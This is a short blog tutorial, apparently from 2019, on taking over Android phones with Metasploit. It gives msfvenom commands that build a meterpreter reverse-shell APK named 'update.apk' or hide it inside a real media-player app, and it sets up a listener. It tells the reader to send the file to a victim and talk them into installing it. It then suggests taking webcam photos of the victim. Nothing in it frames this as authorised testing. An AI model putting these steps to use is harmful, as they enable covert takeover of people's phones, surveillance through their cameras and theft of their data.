Tuesday, January 22, 2019

How to hack Android device with Metasploit

1. Turn on your Kali

2. Open a terminal and type in msfvenom -p android/meterpreter/reverse_tcp LHOST= R > /root/update.apk


NOTE: Make sure to put your IP address after LHOST=. If you want to hack the Android device over the internet, you will have to set up port forwarding and use your external IP address instead of your local IP.

You can also bind this payload to an APK file as well. To do that all you need to do is type in 

msfvenom -x mxplayer.apk -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > -o mxplayer.apk

where mxplayer.apk is your original mxplayer.apk file. This works very well in a real scenario but for this tutorial, I am going to show you the normal way.

3. Open another terminal and type in msfconsole and press Enter


4. Wait for the console to load completely then type in use exploit/multi/handler and press Enter


5. Now we need to set up a reverse payload. You can do that by typing in set payload android/meterpreter/reverse_tcp


6. Now set the LHOST to your local IP address (even if you are hacking over the internet, still use your local IP address here).


7. Now set the LPORT to any port you wish to listen on. I went with a random port 4444 but you can put in any port you want.


8. Now type in exploit and press Enter to start listening.


9. Go into the root folder and you will be able to find the update.apk file. Send this APK file to your victim and convince them to install it. Once it is installed you should be able to fully control the victim's Android device.


Note: The victim's device must have the Unknown Sources option enabled in order for them to install the APK file.

10. Now you can execute commands inside the Metasploit console to control the victim's Android device. Type in help and press Enter to see all of the commands you can run.

You can also view the version of the Android OS that is installed on the victim's phone by executing the sysinfo command.

My favorite one is the webcam_snap 1. This will use the webcam to take a picture of the victim. 


